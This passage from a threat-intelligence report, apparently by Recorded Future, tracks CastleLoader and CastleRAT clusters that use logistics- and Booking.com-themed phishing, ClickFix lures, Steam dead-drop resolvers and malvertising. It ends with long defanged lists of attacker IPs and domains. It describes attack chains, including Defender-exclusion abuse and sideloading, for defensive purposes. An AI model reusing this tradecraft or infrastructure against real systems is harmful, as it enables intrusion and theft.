Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.

Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)

After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.

Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)

By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.

Figure 9: ClickFix command (Source: Recorded Future)

Use of Compromised Infrastructure

As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.

Infrastructure Analysis

Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.

Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.

Domain Re-Registration Tactic

Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. Figure 10 provides two examples of this activity.

Figure 10: Re-registration of logistics-themed domains (Source: Recorded Future)

Notably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for Hometown Logistics LLC in 2021 (see Figure 11).

Figure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)

Public Complaints and Suspected Access to DAT and Loadlink

Some of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the domain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several respondents indicated they did not believe it to be legitimate.

Figure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)

While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.

In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight & Analytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see Figure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.

Figure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)

Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, maritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).

Figure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)

Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by Insikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com and loadlink[.]ca observed in Recorded Future Identity Intelligence.

Figure 15: Account information linked to TAG-160 (Source: Recorded Future)

Access to platforms like DAT Freight & Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.

Possible Overlap with September 2024 Campaign

In September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight & Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.

While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight & Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).

Notably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.

Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161

Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.

Matanbuchus Activity and Booking.com-Themed Infrastructure

Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see Figure 16).

Figure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)

Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the DNS-based version.

Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2 server at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and nimbusvaults[.]com.

Additional Booking.com-Themed Infrastructure

By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.

Phishing Email Management Tooling

By analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.

Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)

The first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.

Figure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)

Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.

Additionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly identified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in Appendix E.

Website 2: Email Manager (“Менеджер Email”)

The second website, hosted on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits several notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address, bred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise. Furthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.

Figure 18: Page linked to “Email Manager” tool (Source: Recorded Future)

Website 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)

The third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator and mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection, subdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target file uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and statistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format: [identifier].[base_name].[main_domain].

Figure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)

The domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within the DOM.

Notably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high ports. The IP addresses are listed in Table 1.

Table 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)

Insikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses announced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains hosted on these IP addresses are listed in Appendix H.

Table 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)

ASN Cluster Possibly Linked to Bearhost

Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.

Infrastructure Similarities with TAG-157 (RefBroker)

Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.

Cluster 3: Booking.com Impersonation Activity

Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.

Infrastructure Analysis

Insikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (update.exe) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.

Figure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)

At the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.

Figure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)

When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (1, 2). Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.

Cluster 4: Malvertising and Fake Software

Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.

Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.

The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.

Possible Connection to Exploit Forum User Sparja

Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).

Figure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)

Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.

On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.

Figure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)

Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.

Figure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)

A related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.

The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.

On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.

While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.

Victimology

Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.

Mitigations

• Leverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.
• Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
• Leverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.
• Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.
• Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
• Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.

Outlook

As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.

Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.

Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.

Appendix A: CastleLoader C2 Servers

(Source: Recorded Future)

Appendix B: Additional Infrastructure Likely Linked to CastleLoader

(Source: Recorded Future)

Appendix C: Logistics-Themed Infrastructure Used by TAG-160

(Source: Recorded Future)

Appendix D: Booking.com-Themed Domains Linked to TAG-161

(Source: Recorded Future)

Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool

(Source: Recorded Future)

Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains

(Source: Recorded Future)

Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3

(Source: Recorded Future)

Appendix H: Indicators of Compromise (IoCs)

CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
